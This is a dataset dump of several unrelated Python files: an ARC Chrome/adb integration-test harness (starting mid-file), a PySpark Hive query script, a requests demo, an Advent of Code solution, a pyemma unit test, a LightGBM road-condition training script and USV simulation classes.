False\n self._chrome = None\n self._xvfb_output_filepath = None\n self._chrome_output_filepath = None\n self._chrome_output_file = None\n\n self._has_error = False\n\n def run(self):\n try:\n args = self._suite_runner.get_system_mode_launch_chrome_command(\n self._name, additional_args=self._additional_launch_chrome_opts)\n logfile_path = self._suite_runner.logger.path\n if self._suite_runner.use_xvfb:\n # This may override older log. However, it should be ok, because\n # older log should be already copied into logger.\n self._xvfb_output_filepath = logfile_path + '-system-mode-xvfb.log'\n args = suite_runner.SuiteRunnerBase.get_xvfb_args(\n self._xvfb_output_filepath) + args\n\n with self._chrome_lock:\n if not self._terminated:\n self._chrome = concurrent_subprocess.Popen(args)\n if self._chrome:\n # This may override older log. However, it should be ok, because\n # older log should be already copied into logger.\n self._chrome_output_filepath = logfile_path + '-system-mode-chrome.log'\n with open(self._chrome_output_filepath, 'w') as chrome_output_file:\n try:\n self._chrome_output_file = chrome_output_file\n self._chrome.handle_output(self)\n finally:\n self._chrome_output_file = None\n finally:\n self._adb_wait_event.set()\n\n # Output handler implementation.\n def handle_stdout(self, line):\n # Although we expect serial is output from stderr, we look at stdout, too\n # because all stderr outputs are rerouted to stdout on running over\n # xvfb-run.\n self._handle_line(line)\n\n def handle_stderr(self, line):\n self._handle_line(line)\n\n def _handle_line(self, line):\n self._chrome_output_file.write(line)\n\n if _is_crash_line(line):\n # An error is found.\n self._suite_runner.logger.write(\n 'chrome unexpectedly exited with line: %s\\n' % line)\n self._has_error = True\n self._adb_wait_event.set()\n return\n\n if self._adb_wait_event.is_set():\n return\n\n # Look for a device serial name (such as \"emulator-5554\").\n match = _ADB_SERVICE_PATTERN.match(line)\n if not match:\n return\n\n self._android_serial = match.group(1) # Note: None on failure.\n if self._android_serial:\n self._suite_runner.logger.write(\n 'ARC adb service serial number is %s\\n' % self._android_serial)\n else:\n self._suite_runner.logger.write('ARC adb service failed to start.\\n')\n self._has_error = True\n\n self._adb_wait_event.set()\n\n def handle_timeout(self):\n self._has_error = True\n\n def is_done(self):\n # Terminate if an error is found.\n return self._has_error\n\n # Following methods are called from SystemMode, running on other thread.\n def wait_for_adb(self):\n self._adb_wait_event.wait(_ADB_WAIT_TIMEOUT_SECONDS)\n\n @property\n def is_ready(self):\n return self._android_serial is not None\n\n @property\n def android_serial(self):\n return self._android_serial\n\n @property\n def has_error(self):\n return self._has_error\n\n def shutdown(self):\n # First, terminate the chrome process.\n with self._chrome_lock:\n self._terminated = True\n if self._chrome:\n self._chrome.terminate()\n\n # Then, the thread will be terminated. Join it.\n self.join()\n\n # Finally, copy the log if necessary.\n if self._chrome_output_filepath:\n args = self._suite_runner.get_system_mode_launch_chrome_command(\n self._name, additional_args=self._additional_launch_chrome_opts)\n\n self._suite_runner.logger.writelines([\n '--------------------\\n',\n ' '.join(args),\n '\\n--------------------\\n'])\n with open(self._chrome_output_filepath) as f:\n self._suite_runner.logger.writelines(f.read())\n self._suite_runner.logger.write('--------------------\\n')\n\n # Output XVFB's log, if necessary.\n if self._xvfb_output_filepath:\n self._suite_runner.logger.write('---------- XVFB output ----------\\n')\n with open(self._xvfb_output_filepath) as f:\n self._suite_runner.logger.write(f.read())\n self._suite_runner.logger.write('---------------------------------\\n')\n self._suite_runner.logger.flush()\n\n\nclass SystemMode(object):\n \"\"\"A class to manage ARC system mode for integration tests.\n\n Example:\n\n from util.test.suite_runner import SuiteRunnerBase\n from util.test.system_mode import SystemMode\n\n class MyTestRunner(SuiteRunnerBase):\n ...\n\n def run(self, unused_test_methods_to_run, scoreboard):\n with SystemMode(self) as arc:\n print arc.run_adb(['shell', 'echo', 'hello'])\n if arc.has_error():\n raise TimeoutError(arc.get_log())\n ...\n \"\"\"\n\n def __init__(self, suite_runner, additional_launch_chrome_opts=None,\n rebuild_crx=False):\n if additional_launch_chrome_opts is None:\n additional_launch_chrome_opts = []\n self._suite_runner = suite_runner\n self._name = suite_runner.name\n self._additional_launch_chrome_opts = additional_launch_chrome_opts[:]\n if not rebuild_crx:\n self._additional_launch_chrome_opts.append('--nocrxbuild')\n\n self._adb = toolchain.get_tool('host', 'adb')\n self._has_error = False\n self._thread = None\n\n def __enter__(self):\n assert self._thread is None\n\n # Start the Chrome, and wait its serial to connect via adb command.\n self._thread = _SystemModeThread(\n self._suite_runner, self._additional_launch_chrome_opts)\n self._thread.start()\n self._thread.wait_for_adb()\n if not self._thread.is_ready:\n self._suite_runner.logger.write(\n 'Timeout waiting to get adb serial number.\\n')\n self._thread.shutdown()\n raise suite_runner.TimeoutError()\n\n try:\n self._suite_runner.run_subprocess(\n [self._adb, 'devices'], omit_xvfb=True)\n self.run_adb(['wait-for-device'])\n except Exception as e:\n # On failure, we need to terminate the Chrome.\n try:\n self._thread.shutdown()\n except Exception:\n # Ignore any exception here, because we re-raise the original\n # exception.\n self._suite_runner.logger.write(\n 'Failed to terminate the Chrome: ' + traceback.format_exc())\n raise e\n\n # All set up is successfully passed.\n return self\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n # Terminate the Chrome.\n self._thread.shutdown()\n\n def run_adb(self, commands, **kwargs):\n \"\"\"Runs an adb command and returns output.\n\n Returns single adb command's output. The output is also appended to\n the internal log container so that all logs can be obtained through\n get_log().\n \"\"\"\n if self._thread is None or not self._thread.is_ready:\n raise SystemModeError('adb is not currently serving.')\n\n args = [self._adb, '-s', self._thread.android_serial] + commands\n kwargs.setdefault('omit_xvfb', True)\n return self._suite_runner.run_subprocess(args, **kwargs)\n\n def has_error(self):\n return self._has_error or self._thread.has_error\n","sub_path":"src/build/util/test/system_mode.py","file_name":"system_mode.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583778732","text":"import argparse\n\nfrom pyspark.sql import SparkSession\n\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--query\", required=True)\n\n args = vars(ap.parse_args())\n query = args[\"query\"]\n\n print(\"query : \", query)\n\n app_name = \"query_hive_table\"\n spark = SparkSession.builder.appName(app_name).enableHiveSupport().getOrCreate()\n sc = spark.sparkContext\n sc.setLogLevel(\"ERROR\")\n sdf = spark.sql(query)\n sdf.show(10)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"models/utils/scripts/query_hive.py","file_name":"query_hive.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"83953201","text":"# coding=utf-8\n\nfrom pip._vendor import requests\n\nr = requests.get(url='http://www.itwhy.org')\nprint(r.status_code)\nr = requests.get(url='http://dict.baidu.com/s', params={'wd': 'python'})\nprint(r.url)\nprint(r.text)\n\nrequests.get('http://www.dict.baidu.com/s', params={'wd': 'python'})\nrequests.post('http://www.ithy.org/wp-comments-post.php', data={'comment': '测试POST'})\n","sub_path":"L02_requests/request_baidu.py","file_name":"request_baidu.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"560371758","text":"\"\"\"\nsolution AdventOfCode 2019 day 13 part 1.\n\nhttps://adventofcode.com/2019/day/13.\n\nauthor: pca\n\n\"\"\"\n\nfrom general.general import read_file\nfrom general.general import get_location_input_files\nfrom app.int_machine import IntMachine\n\n\ndef decode_instructions(instructions):\n if len(instructions) % 3 != 0:\n raise ValueError(\"Expected all instructions to be in pairs of 3 (x, y, tile\")\n\n tiles = dict()\n\n for idx in range(0, len(instructions), 3):\n x, y, tile = instructions[idx:idx+3]\n tiles[(x, y)] = tile\n\n return tiles\n\n\ndef main(args=None):\n\n program_code = read_file(get_location_input_files(), 'input_day13.txt')[0]\n\n m = IntMachine(program_code, [])\n\n m.run()\n\n output_instructions = m.output\n\n tiles = decode_instructions(output_instructions)\n\n # count block tiles (2)\n cnt = 0\n for tile in tiles.values():\n if tile == 2:\n cnt += 1\n\n print(f\"Block tiles: {cnt}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"app/day13_1.py","file_name":"day13_1.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"603594173","text":"'''\nCreated on 19.01.2015\n\n@author: marscher\n'''\nimport itertools\nimport os\nimport tempfile\nimport unittest\nimport mdtraj\nimport numpy as np\n\nfrom mdtraj.core.trajectory import Trajectory\nfrom mdtraj.core.element import hydrogen, oxygen\nfrom mdtraj.core.topology import Topology\n\nfrom pyemma.coordinates.clustering.uniform_time import UniformTimeClustering\nfrom ..discretizer import Discretizer\nfrom ..io.feature_reader import FeatureReader\nfrom ..transform.pca import PCA\n\n\ndef create_water_topology_on_disc(n):\n topfile = tempfile.mkstemp('.pdb')[1]\n top = Topology()\n chain = top.add_chain()\n\n for i in xrange(n):\n res = top.add_residue('r%i' % i, chain)\n h1 = top.add_atom('H', hydrogen, res)\n o = top.add_atom('O', oxygen, res)\n h2 = top.add_atom('H', hydrogen, res)\n top.add_bond(h1, o)\n top.add_bond(h2, o)\n\n xyz = np.zeros((n * 3, 3))\n Trajectory(xyz, top).save_pdb(topfile)\n return topfile\n\n\ndef create_traj_on_disc(topfile, n_frames, n_atoms):\n fn = tempfile.mktemp('.xtc')\n xyz = np.random.random((n_frames, n_atoms, 3))\n t = mdtraj.load(topfile)\n t.xyz = xyz\n t.time = np.arange(n_frames)\n t.save(fn)\n return fn\n\n\nclass TestDiscretizer(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n c = super(TestDiscretizer, cls).setUpClass()\n # create a fake trajectory which has 2 atoms and coordinates are just a range\n # over all frames.\n cls.n_frames = 1000\n cls.n_residues = 30\n cls.topfile = create_water_topology_on_disc(cls.n_residues)\n\n # create some trajectories\n t1 = create_traj_on_disc(\n cls.topfile, cls.n_frames, cls.n_residues * 3)\n\n t2 = create_traj_on_disc(\n cls.topfile, cls.n_frames, cls.n_residues * 3)\n\n cls.trajfiles = [t1, t2]\n\n return c\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"delete temporary files\"\"\"\n os.unlink(cls.topfile)\n for f in cls.trajfiles:\n os.unlink(f)\n\n def test(self):\n reader = FeatureReader(self.trajfiles, self.topfile)\n # select all possible distances\n pairs = np.array(\n [x for x in itertools.combinations(range(self.n_residues), 2)])\n\n reader.featurizer.distances(pairs)\n\n tica = PCA(output_dimension=2)\n\n n_clusters = 2\n clustering = UniformTimeClustering(k=n_clusters)\n\n D = Discretizer(reader, transform=tica, cluster=clustering)\n D.run()\n\n self.assertEqual(len(D.dtrajs), len(self.trajfiles))\n\n for dtraj in clustering.dtrajs:\n unique = np.unique(dtraj)\n self.assertEqual(unique.shape[0], n_clusters)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pyemma/coordinates/tests/test_discretizer.py","file_name":"test_discretizer.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"314759206","text":"import csv\r\nimport math\r\nimport os\r\nimport numpy as np\r\nimport lightgbm as lgb\r\nfrom lightgbm import plot_importance\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn.model_selection import train_test_split, KFold\r\nfrom sklearn.metrics import f1_score, classification_report\r\nfrom xgboostclassify.load_trainftdata import loadtrainftdata, loadtrainftdatabynum, loadtrainftdataby_lbproportion, \\\r\n loadtrainftdataby_date, loadtrainftdataby_lbpp_date, loadtrainftdataby_date_lbnum\r\nimport joblib\r\nimport pandas as pd\r\nmaxlabelscore = 0\r\n\r\n#每次训练后用模型对测试集进行预测\r\ndef predicttestdata(testX,testY):\r\n model = lgb.LGBMClassifier()\r\n model.load_model('E:/My competitions/didi road condition/code/LgbSavedModels/lgb.model')\r\n result = model.predict(testX)\r\n labelscore_report = classification_report(testY, result, target_names=['1', '2', '3'], output_dict=True)\r\n print(classification_report(testY, result, target_names=['1', '2', '3']))\r\n labelscore = labelscore_report['1']['f1-score'] * 0.2 + labelscore_report['2']['f1-score'] * 0.2 + \\\r\n labelscore_report['3']['f1-score'] * 0.6\r\n print('模型得分:' + str(labelscore))\r\n # savepredictedresult(result)\r\n\r\n#输出每轮预测结果\r\ndef outputpredictresult(ans,y_test,trainindex):\r\n # 计算准确率\r\n cnt1 = 0\r\n cnt2 = 0\r\n for i in range(len(y_test)):\r\n if ans[i] == y_test[i]:\r\n cnt1 += 1\r\n else:\r\n cnt2 += 1\r\n print('model '+str(trainindex)+' finished:')\r\n print(\"Accuracy: %.2f %% \" % (100 * cnt1 / (cnt1 + cnt2)))\r\n\r\n\r\n labelscore_report = classification_report(y_test,ans,target_names=['1','2','3'],output_dict=True)\r\n print(classification_report(y_test,ans,target_names=['1','2','3']))\r\n labelscore = labelscore_report['1']['f1-score']*0.2+labelscore_report['2']['f1-score']*0.2+labelscore_report['3']['f1-score']*0.6\r\n print('模型得分:'+str(labelscore))\r\n\r\n return labelscore\r\n#自定义评估函数\r\ndef f1_score_eval(valid_df,preds):\r\n labels = valid_df\r\n preds = np.argmax(preds.reshape(3, -1), axis=0)\r\n scores = f1_score(y_true=labels, y_pred=preds, average=None)\r\n scores = scores[0]*0.2+scores[1]*0.2+scores[2]*0.6\r\n return 'f1_score', scores, True\r\n\r\ndef trainlightgbm(X,Y,testX,testY,trainindex,Feature,nsplits=5):\r\n modeldir = 'E:/My competitions/didi road condition/code/LgbSavedModels/'\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.1, random_state=52)\r\n\r\n fold_importance_df = pd.DataFrame()\r\n fold_importance_df[\"Feature\"] = Feature\r\n\r\n if trainindex == 1:\r\n # 训练模型\r\n model = lgb.LGBMClassifier(\r\n learning_rate=0.1,#梯度下降的步长。默认设置成0.1,我们一般设置成0.05-0.2之间\r\n num_iterations=5000,#迭代次数\r\n max_depth=35,#限制树模型的最大深度. 在 #data 小的情况下防止过拟合. 树仍然可以通过 leaf-wise 生长.< 0 意味着没有限制.\r\n num_leaves=40,#一棵树上的叶子数\r\n feature_fraction=0.8,#如果 feature_fraction 小于 1.0, LightGBM 将会在每次迭代中随机选择部分特征\r\n bagging_fraction=0.8,#类似于 feature_fraction, 但是它将在不进行重采样的情况下随机选择部分数据\r\n bagging_freq=5,#bagging 的频率, 0 意味着禁用 bagging. k 意味着每 k 次迭代执行bagging\r\n reg_alpha=0.001,#表示的是L1正则化\r\n reg_lambda=8,#表示的是L2正则化\r\n cat_smooth=10,#可以降低噪声在分类特征中的影响, 尤其是对数据很少的类别\r\n boosting_type='gbdt',#传统的梯度提升决策树\r\n objective='malticlass',#任务目标,multiclass, softmax 目标函数, 应该设置好 num_class\r\n num_class=3,\r\n # silent=True,#为1时模型运行不输出\r\n # is_unbalance=True,\r\n n_estimators=20,\r\n min_child_samples=21,#一个叶子上数据的最小数量。可以用来处理过拟合。\r\n min_child_weight=0.001#若是基学习器切分后得到的叶节点中样本权重和低于该阈值则不会进一步切分,该值越大模型的学习约保守,同样用于防止模型过拟合\r\n # metric=None#度量函数\r\n )\r\n print('第一次训练,创建模型')\r\n else:\r\n model = joblib.load('E:/My competitions/didi road condition/code/LgbSavedModels/lgb.pkl')\r\n\r\n # labelscore_test = 0\r\n global maxlabelscore # 全局变量用于保存在测试集上预测效果最好的分模型\r\n #K折交叉验证\r\n folds = KFold(n_splits=nsplits, shuffle=True, random_state=2020)\r\n for fold, (trn_idx, val_idx) in enumerate(folds.split(X_train)):\r\n print('the {} training start ...'.format(fold))\r\n lgb_train_X = X_train[trn_idx]\r\n lgb_train_y = y_train[trn_idx]\r\n lgb_val_X = X_train[val_idx]\r\n lgb_val_y = y_train[val_idx]\r\n model.fit(lgb_train_X, lgb_train_y,eval_set=[(lgb_val_X, lgb_val_y)],\r\n eval_metric=lambda y_true, y_pred: [f1_score_eval(y_true,y_pred)],early_stopping_rounds=200,verbose=200)\r\n\r\n fold_importance_df[f'fold_{fold}_imp'] = model.feature_importances_\r\n result = model.predict(testX)\r\n labelscore_test = outputpredictresult(result, testY, trainindex) # 输出以730日数据为测试集的结果\r\n\r\n # 仅保存在测试集上预测效果最好的分模型\r\n if labelscore_test > maxlabelscore:\r\n maxlabelscore = labelscore_test\r\n savefolder = os.path.join(modeldir, str(trainindex))\r\n if not os.path.exists(savefolder): # 判断是否存在文件夹如果不存在则创建为文件夹\r\n os.makedirs(savefolder) # makedirs 创建文件时如果路径不存在会创建这个路径\r\n joblib.dump(model, os.path.join(savefolder, str(trainindex)+'_'+str(fold) + '_' + str(labelscore_test) + '_' + 'lgb.pkl'))\r\n # 显示重要特征\r\n plot_importance(model)\r\n plt.savefig(os.path.join(savefolder, str(trainindex)+'_'+str(fold) + '_ftimportance.jpg'))\r\n plt.close()\r\n\r\n five_folds = [f'fold_{f}_imp' for f in range(0, nsplits)]\r\n fold_importance_df['avg_imp'] = fold_importance_df[five_folds].mean(axis=1)\r\n fold_importance_df.sort_values(by='avg_imp', ascending=False, inplace=True)\r\n print(fold_importance_df[['Feature', 'avg_imp']].head(20))\r\n\r\n # 对测试集进行预测\r\n # ans = model.predict(X_test)\r\n #\r\n # result = model.predict(testX)\r\n # savepredictedresult(result)\r\n\r\n\r\n # labelscore_train = outputpredictresult(ans,y_test,trainindex)#输出训练集中分出的测试集结果\r\n # labelscore_test = outputpredictresult(result,testY,trainindex)#输出以730日数据为测试集的结果\r\n\r\n #总模型保存用于下一次训练\r\n joblib.dump(model,os.path.join(modeldir,'lgb.pkl'))\r\n\r\n\r\ndef savepredictedresult(result):\r\n #测试数据整���\r\n # 读取文件内容\r\n f = open('E:/My competitions/didi road condition/test/test/test.txt', \"r\")\r\n lines = f.readlines()\r\n # 分离出①道路的id 当前时间片 待预测时间片 label ②recent_feature③history_feature\r\n # ①头部数据\r\n\r\n resultpath = '../predictresult/xgboostresult_all.csv'\r\n resultfile = open(resultpath, 'w', newline='')\r\n csv_writer = csv.writer(resultfile, dialect='excel', lineterminator='\\n')\r\n csv_writer.writerow(['link','current_slice_id','future_slice_id','label'])\r\n for (line,label) in zip(lines,result):\r\n headinfo = line.split(\";\")[0].split(' ')\r\n linkid = headinfo[0]\r\n currenslice = headinfo[2]\r\n futureslice = headinfo[3]\r\n csv_writer.writerow([linkid,currenslice,futureslice,int(label)])\r\n f.close()\r\n resultfile.close()\r\n#列表等分割\r\ndef chunks(arr, m):\r\n n = int(math.ceil(len(arr) / float(m)))\r\n return [arr[i:i + n] for i in range(0, len(arr), n)]\r\n#训练集太大,分开训练\r\ndef aparttrain(traindatadir,traindate,testdate,oneturndatanum,Feature,trainindex=0,labelproportion=[3,1,1]):\r\n links = os.listdir(traindatadir)\r\n testdatadir = 'E:/My competitions/didi road condition/code/dataSelfcompleted/newfeatures4/extractedtestdatafts_ht-7-14缺失用traindata补全/'\r\n\r\n testlinkslist = gettestlinkslist(links,testdatadir)\r\n\r\n print('开始加载测试数据-全部加载:',len(testlinkslist),' ',testdate,' ',[15000,400,200])\r\n testX, testY = loadtrainftdataby_date_lbnum(traindatadir,testdate,testlinkslist,[15000,400,200])\r\n # testX=[]\r\n # testY=[]\r\n print('test data successfully loaded:',str(len(testY)))\r\n #数据按比例抽样后可不用分批次训练\r\n if oneturndatanum == 1:\r\n # 测试用\r\n print('开始分批次训练:',str(oneturndatanum))\r\n links = chunks(links, oneturndatanum)\r\n\r\n trainindex = trainindex#仅训练1次\r\n for linklist in links:\r\n trainindex+=1\r\n # 加载测试数据训练数据按比例加载,测试数据全部加载\r\n print('开始按label比例加载训练数据')\r\n trainX, trainY = loadtrainftdataby_lbpp_date(traindatadir, traindate, linklist, labelproportion)\r\n # trainX, trainY = loadtrainftdataby_date(traindatadir, traindate, linklist)\r\n print('train data successfully loaded ',str(trainindex))\r\n # 数据打乱\r\n indices = np.arange(trainX.shape[0])\r\n np.random.shuffle(indices)\r\n trainX = trainX[indices]\r\n trainY = trainY[indices]\r\n\r\n print(str(len(trainX)) + ' ' + str(len(trainY)) + ' data shuffled start training lightgbm!')\r\n trainlightgbm(trainX, trainY, testX, testY, trainindex,Feature)\r\n\r\n elif oneturndatanum > 1:\r\n #分批加载训练数据并训练\r\n links = os.listdir(traindatadir)\r\n linksapart = chunks(links,oneturndatanum)\r\n trainindex = 0\r\n for linklist in linksapart:\r\n X, Y = loadtrainftdataby_date(traindatadir,traindate,links)\r\n trainindex = trainindex+1\r\n print('train data successfully loaded '+str(trainindex))\r\n #数据打乱\r\n indices = np.arange(X.shape[0])\r\n np.random.shuffle(indices)\r\n X = X[indices]\r\n Y = Y[indices]\r\n print('data shuffled, start training xgboost!')\r\n trainlightgbm(X, Y, testX,testY, trainindex)\r\n\r\ndef gettestlinkslist(traindatalinks,testdatadir):\r\n traindatalinks = set(traindatalinks)\r\n testdatalinks = os.listdir(testdatadir)\r\n resultlinks = []\r\n for lk in testdatalinks:\r\n if lk in traindatalinks:\r\n resultlinks.append(lk)\r\n return resultlinks\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n traindatadir = 'E:/My competitions/didi road condition/code/dataSelfcompleted/newfeatures4/extractedfeatures/'#提取特征后的训练数据,按linkid分成文件\r\n # traindatadir = 'E:/My competitions/didi road condition/code/processeddata/extractedfeatures/'\r\n # traindate = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27,28,29,30]\r\n # traindate = [25]\r\n # traindate = [1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 15, 16, 17, 18, 19, 22, 23, 25, 26, 29,\r\n # 30]\r\n traindate = [15, 16, 17, 18, 19,\r\n 22, 23, 24, 25, 26,\r\n 29,30]\r\n # testdate = [1]\r\n testdate = [25, 26,\r\n 29,30]\r\n oneturndatanum = 1#每次提取500条道路的信息进行训练\r\n ChineseFt = ['linkid',\r\n\r\n '当前时间片', '待预测时间片', '待预测时间片和当前时间片的差值的绝对值',\r\n\r\n 'link的限速', 'link的的功能等级', 'link的速度限制等级', 'link的车道数', 'link的level', 'link的长度', 'link的宽度',\r\n\r\n 'Rc畅通状态占比', 'Rc缓行状态占比', 'Rc拥堵状态占比', '主要状态', '主要状态占比', 'Rc平均路况速度', 'Rc平均eta速度', 'Rc平均路况速度/平均eta速度',\r\n 'Rc平均路况速度/link限速', 'Rc平均eta速度/link限速', 'Rc参与路况计算的车辆总数',\r\n\r\n 'Ht4r畅通状态占比', 'Ht4r缓行状态占比', 'Ht4r拥堵状态占比', 'Ht4主要状态', 'Ht4主要状态占比', 'Ht4r平均路况速度', 'Ht4r平均eta速度',\r\n 'Ht4r平均路况速度/平均eta速度', 'Ht4r平均路况速度/link限速', 'Ht4r平均eta速度/link限速', 'Ht4r参与路况计算的车辆总数',\r\n\r\n 'Ht3r畅通状态占比', 'Ht3r缓行状态占比', 'Ht3r拥堵状态占比', 'Ht3主要状态', 'Ht3主要状态占比', 'Ht3r平均路况速度', 'Ht3r平均eta速度',\r\n 'Ht3r平均路况速度/平均eta速度', 'Ht3r平均路况速度/link限速', 'Ht3r平均eta速度/link限速', 'Ht3r参与路况计算的车辆总数',\r\n\r\n 'Htall畅通状态占比', 'Htall缓行状态占比', 'Htall拥堵状态占比', 'Htall主要状态', 'Htall主要状态占比', 'Htall平均路况速度',\r\n 'Htall平均eta速度', 'Htall平均路况速度/平均eta速度', 'Htall平均路况速度/link限速', 'Htall平均eta速度/link限速',\r\n 'Htall参与路况计算的车辆总数']\r\n\r\n trainindexorigin = 0 #接着之前的轮数继续训练\r\n labelproportion = [10, 4, 1]\r\n trainnum = 5#模型在全部数据上多轮训练\r\n for trainnum in range(0,trainnum):#全部数据一共训练trainnum轮\r\n print('第',str(trainnum),'轮训练:')\r\n print('》》》》》》》》》》》》》》》》》》》》》》》》~^o^~《《《《《《《《《《《《《《《《《《《《《')\r\n trainindex = trainindexorigin + trainnum*oneturndatanum\r\n aparttrain(traindatadir,traindate,testdate,oneturndatanum,ChineseFt,trainindex,labelproportion)\r\n","sub_path":"LGBM+XGBOOST/lightgbm-train.py","file_name":"lightgbm-train.py","file_ext":"py","file_size_in_byte":14049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"315869006","text":"# coding=utf-8\r\n\r\nfrom collections import namedtuple\r\nfrom math import sin, cos, pi\r\n\r\nclass StaticUSV(object):\r\n \"\"\"一个静态的USV类,move方法将会留空,这表示此类USV不可行动\"\"\"\r\n\r\n def __init__(self, uid, x, y, env):\r\n '''每艘USV的独立id,可以用来区分各舰'''\r\n self.id = uid\r\n '''env是指当前USV所在的环境,它指向当前游戏中这艘USV所在的Map类实例'''\r\n self.env = env\r\n self.x, self.y = x, y\r\n self.speed = 0.0\r\n self.angular_speed = 0.0\r\n self.direction = 0.0\r\n self.is_enemy = False\r\n\r\n def decision_algorithm(self):\r\n '''decision_algroithm是指导USV运动的方法,返回一个自定义的action字典'''\r\n pass\r\n\r\n def move(self):\r\n '''USV运动的主方法,根据action来调用其它辅助函数完成下一时刻USV位置的计算'''\r\n pass\r\n\r\n def is_decision_legal(self, decisionX, decisionY):\r\n '''判断USV决定要去的位置是否合法;在这个基本的函数里,所有舰艇不得走出地图范围,不得走到\r\n 其它舰艇已经占用的位置;友军舰艇不得走到被保护的目标点.'''\r\n width, height = self.env.width, self.env.height\r\n if(decisionX < 0 or decisionY < 0 or decisionX > width - 1 or decisionY > height - 1):\r\n return False\r\n\r\n occupied = False\r\n for ship in self.env.ships:\r\n if(ship.id == self.id):\r\n continue\r\n shipX, shipY = ship.coordinate()\r\n if(shipX == decisionX and shipY == decisionY):\r\n occupied = True\r\n\r\n if(not self.is_enemy):\r\n tX, tY = self.env.target_coordinate()\r\n if(tX == decisionX and tY == decisionY):\r\n occupied = True\r\n\r\n if(occupied):\r\n return False\r\n\r\n return True\r\n\r\n def turn(self, clockwise):\r\n '''这一函数描绘本艘USV在一单位时间内如何改变自身方向,因此其作用是在顺时针或逆时针方向上\r\n 增加当前USV角速度的绝对值(角度变化=角速度*1时间单位=角速度的绝对值)'''\r\n if(clockwise):\r\n self.direction += self.angular_speed\r\n if(self.direction >= 360):\r\n self.direction -= 360\r\n else:\r\n self.direction -= self.angular_speed\r\n if(self.direction < 0):\r\n self.direction += 360\r\n\r\n def coordinate(self):\r\n '''返回本USV的位置'''\r\n return self.x, self.y\r\n\r\n def set_as_enemy(self):\r\n '''将本USV定义为敌方(��攻方)'''\r\n self.is_enemy = True\r\n\r\n def set_as_friendly(self):\r\n '''将本USV定义为友军(防守方)'''\r\n self.is_enemy = False\r\n\r\n\r\nclass BasicPlaneUSV(StaticUSV):\r\n \"\"\"基本平面USV, 这个USV可以在瞬间改变自己的角速度和速度, 转动后在对应方向上走动一帧时间*速度的距离\"\"\"\r\n\r\n def __init__(self, uid, x, y, env):\r\n super(BasicPlaneUSV, self).__init__(uid, x, y, env)\r\n self.action_class = Action = namedtuple(\"action\", ['stay', 'clockwise', 'angular_speed', 'speed'])\r\n\r\n def decision_algorithm(self):\r\n '''这种USV的action对象有四个属性:1.stay,如果设为True,代表USV决定不行动,后面的参数被忽略;\r\n 2.clockwise,转动方向是否是顺时针;3.angular_speed角速度;4.speed速度.\r\n 如果stay参数为False,USV将会根据clockwise的指示转动angular_speed*t(一帧时间)度,然后前进当前的速度*t的距离'''\r\n Action = self.action_class\r\n example_action = Action(False, False, 20.0, 10.0)\r\n example_action1 = Action(True, False, 0.0, 0.0)\r\n raise Exception(\"请覆盖decision_algorithm方法!\")\r\n\r\n def move(self):\r\n action = self.decision_algorithm()\r\n if(not action.stay):\r\n self.update_direction(action)\r\n self.update_speed(action)\r\n self.update_coordinate()\r\n\r\n def update_direction(self, action):\r\n self.angular_speed = action.angular_speed\r\n self.turn(action.clockwise)\r\n\r\n def update_speed(self, action):\r\n self.speed = action.speed\r\n\r\n def update_coordinate(self):\r\n self.x -= cos(pi * self.direction / 180) * self.speed\r\n self.y += sin(pi * self.direction / 180) * self.speed\r\n\r\n\r\n\r\nclass OneStepUSV(BasicPlaneUSV):\r\n \"\"\"一个简单的USV类,在网格上它一次只能走动一步.每一时间单位,这种USV能够瞬时的改变自己的角速度,然后转动,最后向\r\n 转动后的方向上移动一格.\"\"\"\r\n\r\n def __init__(self, uid, x, y, env):\r\n super(OneStepUSV, self).__init__(uid, x, y, env)\r\n self.action_class = namedtuple(\"action\", ['stay', 'clockwise', 'angular_speed'])\r\n self.speed = 1\r\n\r\n def decision_algorithm(self):\r\n '''这种USV的action字典有三个参数:1.stay,如果设为True,代表USV决定不行动,后面的参数被忽略;\r\n 2.clockwise,转动方向是否是顺时针;3.angular_speed角速度.\r\n 如果stay参数为False,USV将会根据clockwise的指示转动angular_speed度,然后前进一步.注意由于\r\n 此模型下angular_speed只能为90的倍数'''\r\n Action = self.action_class\r\n example_action = Action(False, False, 20.0)\r\n example_action1 = Action(True, False, 0.0)\r\n raise Exception(\"请覆盖decision_algorithm方法!\")\r\n\r\n def move(self):\r\n action = self.decision_algorithm()\r\n if(not action.stay):\r\n self.update_direction(action)\r\n self.update_coordinate()\r\n\r\n def update_coordinate(self):\r\n if(self.direction == 0.0):\r\n self.x -= self.speed\r\n elif(self.direction == 90.0):\r\n self.y += self.speed\r\n elif(self.direction == 180.0):\r\n self.x += self.speed\r\n elif(self.direction == 270.0):\r\n self.y -= self.speed\r\n else:\r\n raise Exception(\r\n \"OneStepUSV的direction属性应该是正交角度,然而,得到了 %f 度\" % self.direction)\r\n # print \"我是%d号船,我现在走到了(%f,%f)\"%(self.id,self.x,self.y)","sub_path":"usv.py","file_name":"usv.py","file_ext":"py","file_size_in_byte":6210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 